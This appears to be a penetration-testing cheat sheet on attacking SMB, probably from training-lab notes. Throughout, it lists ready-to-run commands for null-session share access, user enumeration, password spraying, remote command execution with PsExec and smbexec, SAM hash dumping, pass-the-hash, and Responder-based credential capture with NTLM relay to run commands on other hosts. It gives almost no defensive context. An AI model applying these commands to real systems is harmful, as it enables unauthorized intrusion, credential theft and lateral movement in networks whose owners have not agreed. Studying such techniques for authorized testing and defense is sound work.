Server Message Block (SMB) is a communication protocol created for providing for providing shares access to files and printers across nodes on a network. Usually runs on TCP/139 and UDP/137,138. Runs on TCP/445 wihtout NetBIOS layer.

Samba is a Unix based open-source implementation of the SMB protocol.

A commonly related protocol to SMB is Microsoft Remote Procedure Call (MSRPC) that provides an application a generic way to execute a procedure in a local or remote process without having to understand the network protocols used to support the communication.

Null Sessions and Share Misconfigurations

SMB can be configured to not require authentication, which is called a null session.

# display a list of the server's shares with a null session
smbclient -N -L //10.129.14.128
 
# enumerate the network shares and access
smbmap -H 10.129.14.128
 
# browse subdirectories of a share
smbmap -H 10.129.14.128 -r notes
 
# download files
smbmap -H 10.129.14.128 --download "notes\note.txt"
 
# upload files
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

RPC and Enumeration Tools

Use RPC and enum tooling to enumerate users, shares, and host details.

# enumeration tool
rpcclient -U'%' 10.10.110.17
 
# enumeration
/enum4linux-ng.py 10.10.11.45 -A -C

Password Spraying

When brute-forcing, an account lock out can occur if we hit the threshold. Password spraying is a safer alternative since we can target a list of usernames with one common password to avoid account lockouts.

# password spraying
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

Remote Command Execution

PsExec a tool that lets use execute processes on other systems works because it has a Windows service image inside of its executable. IT takes this service and deploys it to the admin$ share on the remote machine. It then uses the RPC interace over SMB to access the Windows Service Control Manager API. Then starts the PsExec service on the remote machine to create a named pipe that can send commands to the system.

# connect to a remote machine with local admin
impacket-psexec administrator:'Password123!'@10.10.110.17
# or
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Local User and Hash Dumping

After authenticated access, enumerate logged-on users and dump SAM hashes if privileges allow.

# enumerating local users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
 
# extract hashes from SAM database
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Pass the Hash

Use the NT hash directly when cracking is unnecessary or unsuccessful.

# pass the hash
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Forced Authentication and Relay

We can also abuse SMB by creating a fake SMB server to capture users NetNTLMv1/v2 hashes. By creating a responder fake SMB service. The flow is as follows when a system performs Name Resolution (a set procedures conducted by a machine to retrieve a hosts’ IP address by its hostname):

  • hostname file share’s IP address
  • the local host file will be checked for records
  • if no records found, the machine switches to the local DNS cache
  • if no local DNS record a query will be sent to the DNS server configured
  • if all else fails the machine will issue a multicast query requesting the IP address of the file share from other machines on the network.
  • this query includes fake SMB server, it then spoofs responses, and can then steal credentials.
# start responder attack
sudo responder -I ens33
 
# if captured hash cannot be cracked we can relay to another machine
## turn off smb first
cat /etc/responder/Responder.conf | grep 'SMB ='
## run commands 
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 -c '<command>'